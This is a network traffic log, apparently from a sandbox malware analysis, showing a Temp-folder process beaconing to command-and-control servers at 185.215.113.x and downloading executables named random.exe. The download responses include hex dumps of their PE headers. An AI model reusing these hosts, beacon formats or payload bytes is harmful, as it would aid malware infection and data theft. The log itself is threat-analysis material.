Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:16.712050915 CET	140	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Mon, 04 Nov 2024 16:30:39 GMT If-None-Match: "6728f6af-206a00"
Nov 4, 2024 17:36:17.643974066 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:17 GMT Last-Modified: Mon, 04 Nov 2024 16:30:39 GMT Connection: keep-alive ETag: "6728f6af-206a00"

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.5	50315	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:19.077228069 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 4, 2024 17:36:19.978919983 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:36:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:36:19.982224941 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJEC Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 42 43 38 34 33 45 42 33 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 2d 2d 0d 0a Data Ascii: ------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="hwid"EBBC843EB3592398989009------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="build"tale------AEBGIEGCFHCFHIDHIJEC--
Nov 4, 2024 17:36:20.262870073 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:36:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.5	50317	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:20.018074036 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 33 39 30 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003901001&unit=246122658369
Nov 4, 2024 17:36:20.947608948 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.5	50318	185.215.113.16	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:20.958446980 CET	138	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Mon, 04 Nov 2024 15:50:39 GMT If-None-Match: "6728ed4f-e0800"
Nov 4, 2024 17:36:21.872529030 CET	191	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:21 GMT Last-Modified: Mon, 04 Nov 2024 15:50:39 GMT Connection: keep-alive ETag: "6728ed4f-e0800"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.5	50321	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:24.087831020 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 33 39 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003902001&unit=246122658369
Nov 4, 2024 17:36:25.003098011 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.5	50322	185.215.113.16	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:25.019289017 CET	138	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Mon, 04 Nov 2024 15:51:04 GMT If-None-Match: "6728ed68-2aa800"
Nov 4, 2024 17:36:25.920687914 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:25 GMT Last-Modified: Mon, 04 Nov 2024 15:51:04 GMT Connection: keep-alive ETag: "6728ed68-2aa800"

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.5	50326	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:27.319760084 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 4, 2024 17:36:28.214556932 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:28 GMT Content-Type: application/octet-stream Content-Length: 2124288 Last-Modified: Mon, 04 Nov 2024 16:30:39 GMT Connection: keep-alive ETag: "6728f6af-206a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 72 00 00 04 00 00 c1 20 21 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng, r@Pr !@P.d. p.v@.rsrc .@.idata .@ ).@fawplrfxPX@jtmuhxjqrB @.taggant0 r"H @
Nov 4, 2024 17:36:28.214586973 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:36:28.214597940 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:36:28.214704990 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:36:28.214718103 CET	424	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:36:28.214751005 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ~=P!8Ro9r$I&G-?`o+e6T>gYT#>n _L!_!d`rc;,6s
Nov 4, 2024 17:36:28.214764118 CET	1236	IN	Data Raw: df 22 18 34 a2 c8 cf a1 2d bf 97 f8 34 26 0c 85 0e d7 f1 8c 97 65 c8 cb 63 85 c8 60 4b 02 53 7a 88 17 66 27 b6 1b 7c 1e ca 9b a1 4b 36 c7 7f 66 d7 7b a4 93 55 c9 af b8 24 3e ce 28 e2 f0 4f b2 09 47 a2 56 54 27 7b 7b 16 af 4e e0 33 f1 f3 ef e1 ae Data Ascii: "4-4&ec`KSzf'\|K6f{U$>(OGVT'{{N3ZG,&s;BjYm:)bf2Rtb_a-Vo/DG{*TYvMN=&.,pK;F63uZ}KVxj1)o5u
Nov 4, 2024 17:36:28.214776993 CET	424	IN	Data Raw: e3 8f 67 2c 03 40 6a d9 33 cb 02 60 a7 61 14 d2 de 54 28 11 22 b6 e3 fa f1 d8 d3 ce 1f d2 05 b5 2d 85 74 21 f0 a6 1b 04 ee c0 ea 85 b6 cd 06 ef b1 ce 5f 74 02 25 54 8d 28 7b 16 a6 bb ec 22 c6 5d cb 84 20 b6 c7 1d 30 4d e8 89 2b 43 67 d3 60 10 b8 Data Ascii: g,@j3`aT("-t!_t%T({"] 0M+Cg`} B\|?r4uv1n#5/?tP;t)?T(bQ?y t'[Nvb_(Xj~X^K/S12+UWw]K4%3d/ t;@2)oZt
Nov 4, 2024 17:36:28.214790106 CET	1236	IN	Data Raw: fa 0c fc 17 27 e7 5f 0c cf 43 3e 54 48 df 84 28 92 c8 bc 2f 26 d3 6f 7b 10 ff 9f 51 ae d0 f5 28 97 37 38 29 31 4f 66 29 86 98 8a 23 ee ef 38 23 58 6f 2b 20 72 2f 84 f1 c9 0e 42 15 ee 87 2b f4 a1 ea a0 30 22 c7 78 51 46 03 60 30 bc 49 2b 52 6a 0a Data Ascii: '_C>TH(/&o{Q(78)1Of)#8#Xo+ r/B+0"xQF`0I+RjF()7-N).C@S:\/',7e/K&&Gf)#H)n2Xe+fI+kdw;3&R$+kW>)e)~~?R1e"k2`jB
Nov 4, 2024 17:36:28.214802027 CET	1236	IN	Data Raw: b1 ef 3c 34 d6 a0 32 20 59 ef 0a 7b fa b0 22 29 55 9c 2b e4 88 9d 2f f0 26 c8 cf 20 6c 70 44 40 52 af f6 98 fd 59 ff cc 0f a0 1f d4 aa d7 0b 29 e2 2b 61 b4 fc d3 2a 15 ee e5 2a 64 2f 16 28 c4 88 b6 0b e0 26 03 a0 4e c8 ce 4b 0a 32 17 2b 31 7e 98 Data Ascii: <42 Y{")U+/& lpD@RY)+a*d/(&NK2+1~B%.gXGW+Rj]{14c>6IX /QpOY1c>KO0._+G`o?'YO'on&G2*7(+f&7B
Nov 4, 2024 17:36:28.220055103 CET	1236	IN	Data Raw: 16 04 15 18 d5 a0 33 74 96 aa be 4b 91 e8 fb af 26 e5 77 20 3c ad 9b cf d6 ac 87 c7 15 a0 db 4b 73 f5 f3 80 95 1b ec 28 ff 8f 33 c4 58 7b e2 18 ee 7f 2b 0c e2 c1 84 95 e7 cf 10 fe 01 c1 5d 2c 27 98 9d cb 49 0d d8 67 06 48 2b 58 16 f8 99 5a 9e b5 Data Ascii: 3tK&w <Ks(3X{+],'IgH+XZg?/vy:fF"3Gf{&?G8Xo+ j+Rtw+{.$#5H/P_3_Xk1fG`K*U>KSP',~=c)11vp"y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.5	50327	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:28.198219061 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 33 39 30 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003903001&unit=246122658369
Nov 4, 2024 17:36:29.368133068 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Nov 4, 2024 17:36:29.370634079 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.5	50330	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:30.992676973 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:36:31.919047117 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.5	50333	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:33.434948921 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 4, 2024 17:36:34.358083010 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.5	50334	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:34.545317888 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 4, 2024 17:36:35.450597048 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:36:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 4, 2024 17:36:35.453372955 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHDAFHDHCBFIDGCFIDG Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 42 43 38 34 33 45 42 33 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 2d 2d 0d 0a Data Ascii: ------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="hwid"EBBC843EB3592398989009------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="build"tale------IEHDAFHDHCBFIDGCFIDG--
Nov 4, 2024 17:36:36.156225920 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:36:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=
Nov 4, 2024 17:36:36.156958103 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:36:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=
Nov 4, 2024 17:36:36.160154104 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:36:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.5	50336	185.215.113.43	80	7576	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:36.172564983 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 4, 2024 17:36:37.076406002 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.5	50338	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 17:36:38.061314106 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 4, 2024 17:36:38.970798969 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 04 Nov 2024 16:36:38 GMT Content-Type: application/octet-stream Content-Length: 2124288 Last-Modified: Mon, 04 Nov 2024 16:30:39 GMT Connection: keep-alive ETag: "6728f6af-206a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 72 00 00 04 00 00 c1 20 21 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng, r@Pr !@P.d. p.v@.rsrc .@.idata .@ ).@fawplrfxPX@jtmuhxjqrB @.taggant0 r"H @
Nov 4, 2024 17:36:38.970817089 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:36:38.970833063 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:36:38.970855951 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:36:38.970865965 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 4, 2024 17:36:38.970877886 CET	1236	IN	Data Raw: 3b 46 1e 45 0a 48 ac 4e 0e 3b 97 6e a3 8c 40 56 c2 e7 73 ea 25 98 16 11 ba 63 71 61 84 b5 05 0b b2 08 6f 2c 60 c3 75 54 dd 90 83 21 e3 a7 e3 57 ee 49 38 31 75 1b 91 56 be e5 6f 99 de 8a 6c 14 e6 26 a8 37 ea 26 a8 37 be 26 a8 37 c2 26 a8 37 b6 26 Data Ascii: ;FEHN;n@Vs%cqao,`uT!WI81uVol&7&7&7&7&7&7&7&7&A\|;7^!r,9)o)ry+kN#(k#,li 1x,U6lM){p%43_D(,^njz*xL Nd&k}L
Nov 4, 2024 17:36:38.970890045 CET	1236	IN	Data Raw: f3 2e 1c 87 92 34 bb 67 32 75 92 9f 44 9a 75 93 50 2b 03 98 ed 7e 9f bc 52 fb c4 b3 0d 25 1c b3 a5 df 65 a8 66 27 22 cf 1e 86 64 4a f3 b3 e2 82 38 d7 82 20 97 d0 73 0c 28 2f 63 18 90 b9 2e b2 1a e5 17 23 87 ac a7 1b 35 a8 d9 df 0e 04 74 7c 01 43 Data Ascii: .4g2uDuP+~R%ef'"dJ8 s(/c.#5t\|Cw3ysA"#4W@tqCp@ vzPp0L8uG1<L8#-'41y*^3d_"o8\O`vV{(0"Rr
Nov 4, 2024 17:36:38.970947981 CET	1236	IN	Data Raw: 02 0b b4 80 ee df 2a 80 a2 ea ac 35 16 25 df 97 15 a0 83 4b a0 f8 eb 73 01 17 fc c7 26 e5 f3 32 b7 19 98 71 96 8f 9a 28 16 cb b2 5f 57 bf 41 b8 ff 9f ff 5f f6 a0 10 96 fe 1b 3d a0 05 2f 5c 4c 2c f8 bf 74 01 96 fb 67 27 e5 4f 33 23 15 c8 d3 f8 17 Data Ascii: 5%Ks&2q(_WA_=/\L,tg'O3#(M)(?a)Fm.=%Q'3)d{/I2k3H#^t&^+RFR848~eS}-(.s(G_f)B#!)-^*3.)h(O
Nov 4, 2024 17:36:38.970959902 CET	1236	IN	Data Raw: 9b ed 9f 40 fb af 14 23 2a 53 5e 89 d9 6c 54 94 ef b7 82 28 de af 43 96 fe 97 36 a0 ed 2f 44 4c e5 f8 7f 75 30 c4 45 2e 22 a0 93 31 fc c0 0f 74 d1 6d d4 28 2e 83 9c 1c 40 03 37 28 16 bb 9a 1b 74 c5 c7 1f 0f cb 65 42 23 e5 5e 0c 27 cf 05 f3 06 e3 Data Ascii: @#S^lT(C6/DLu0E."1tm(.@7(teB#^'Ri*T/8(gC!s] H+1v'/V"++e=U %H:O+>?a)F60 )RHx'/!(>?')H^%0(+
